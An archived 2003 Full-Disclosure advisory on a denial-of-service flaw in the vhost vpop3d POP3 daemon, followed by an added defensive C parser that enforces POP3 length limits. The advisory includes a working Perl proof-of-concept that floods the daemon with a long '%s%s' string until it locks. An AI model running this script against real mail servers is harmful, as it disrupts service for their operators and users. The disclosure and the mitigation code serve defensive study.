[Full-Disclosure] Vhost-3.05rc3 DOS..

From: Daniel (deadbeatat_private)
Date: Tue Aug 19 2003 - 04:15:02 PDT


    	Topic:			vhost-3.05r3 DOS
    
    	Product:		vhost-3.05r3
    
    	Note:			for a laugh grep vpop3d.cc for
    				strcpy or sprintf..loool
    
    	Vendor Notification:	Vendor Notified
    
    
    Background:
    
    	vhost - one-step solution for all virtual hosting needs
    	Copyright(c) Chaogic Systems, LLC. http://chaogic.com
    	Author: Jake Fan <jakeat_private>
    	allows the setting up of vhosts for mail and web.
    
    
    Problem Description:
    
    	It seems that an attacker (remote or local) can cause a DoS on the
    	vpop3d server using a lengthy request.
    	This seems to cause the POP3 server to time out, then the daemon
    	drops. Note this was tested locally, with the binary.
    	It also seems that if we attach gdb to the running process, that
    	also locks vpop3d.. ;)
    
    	Once we've hit it with our huge USER string it gives this message
    	after 5 mins or so:
    	"-ERR POP3 Server Abnormal Shutdown: Timeout waiting for command
    	from client"
    
    Impact:
    
    	DoS on the vpop3d daemon, which means a manual restart of the daemon.
    
    
    Patch:
    
    	Far too much to patch in this code!!!
    
    
    Exploit:
    
    Nothing special..
    ----------------------------------------------------------
    #!/usr/bin/perl
    
    #vpop3d Denial Of Service..
    #Proof of Concept script..
    #Deadbeat, uk2sec..
    #e: deadbeatat_private
    #e: danielsat_private
    
    use IO::Socket;
    $host = $ARGV[0];
    $port = $ARGV[1];
    if(!$ARGV[1]){
            die "usage: perl $0 <host> <port>\n";
    }
    $dos = "%s%s"x5000;
    $req = "USER $dos";
    $sox = IO::Socket::INET->new(
            Proto=>"tcp",
            PeerPort=>$port,
            PeerAddr=>$host
    )or die "can't connect to $host : $port\n";
    sleep 2;
    print $sox $dos;
    sleep 1;
    print "done..vpop3d should lock now :)\n";
    
    ------------------------------EOF-------------------------
    
    
    Regards,
    Deadbeat, uk2sec..
    
    -------------------------------------
    Deadbeat,
    e:	deadbeatat_private
    e:	danielsat_private
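
Added example (not part of the original post and not vhost code): a bounded POP3 command-line parser in C that applies the RFC 1939 argument limit (40 characters) and the RFC 2449 line limit (255 octets including CRLF) before anything is copied, so a 20000-byte string with no line terminator, like the one the script above builds, is rejected at once rather than left to a read timeout. The names `pop3_parse_line`, `struct pop3_cmd` and the `POP3_*` status codes are hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define POP3_MAX_LINE 255 /* RFC 2449: whole command, CRLF included */
#define POP3_MAX_ARG   40 /* RFC 1939: one argument */

enum pop3_parse { POP3_OK, POP3_INCOMPLETE, POP3_TOO_LONG, POP3_BAD_SYNTAX };

struct pop3_cmd {
    char verb[5];               /* 3-4 letter keyword, upper-cased */
    char arg[POP3_MAX_ARG + 1]; /* text after the first space */
};

/* Parse one command from buf[0..len); *out is valid only on POP3_OK.
 * Simplification: everything after the keyword is one argument. */
enum pop3_parse pop3_parse_line(const char *buf, size_t len, struct pop3_cmd *out)
{
    size_t scan = len < POP3_MAX_LINE ? len : POP3_MAX_LINE;
    const char *eol = memchr(buf, '\n', scan);
    if (eol == NULL) /* no terminator: reject now instead of waiting */
        return len >= POP3_MAX_LINE ? POP3_TOO_LONG : POP3_INCOMPLETE;
    size_t n = (size_t)(eol - buf);
    if (n > 0 && buf[n - 1] == '\r')
        n--; /* drop the CR of CRLF */

    size_t v = 0;
    while (v < n && buf[v] != ' ')
        v++;
    if (v < 3 || v > 4)
        return POP3_BAD_SYNTAX;
    size_t a = v < n ? v + 1 : n; /* skip the single separating space */
    size_t alen = n - a;
    if (alen > POP3_MAX_ARG)
        return POP3_TOO_LONG; /* length checked before any copy */
    for (size_t i = 0; i < v; i++)
        if (!isalpha((unsigned char)buf[i]))
            return POP3_BAD_SYNTAX;
    for (size_t i = 0; i < alen; i++)
        if (!isprint((unsigned char)buf[a + i]))
            return POP3_BAD_SYNTAX;
    for (size_t i = 0; i < v; i++)
        out->verb[i] = (char)toupper((unsigned char)buf[i]);
    out->verb[v] = '\0';
    memcpy(out->arg, buf + a, alen);
    out->arg[alen] = '\0';
    return POP3_OK;
}
```

On `POP3_INCOMPLETE` the caller keeps reading under its own deadline; on `POP3_TOO_LONG` it answers `-ERR` and drops the connection without buffering more input.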
    
    
    



    This archive was generated by hypermail 2b30 : Tue Aug 19 2003 - 04:55:15 PDT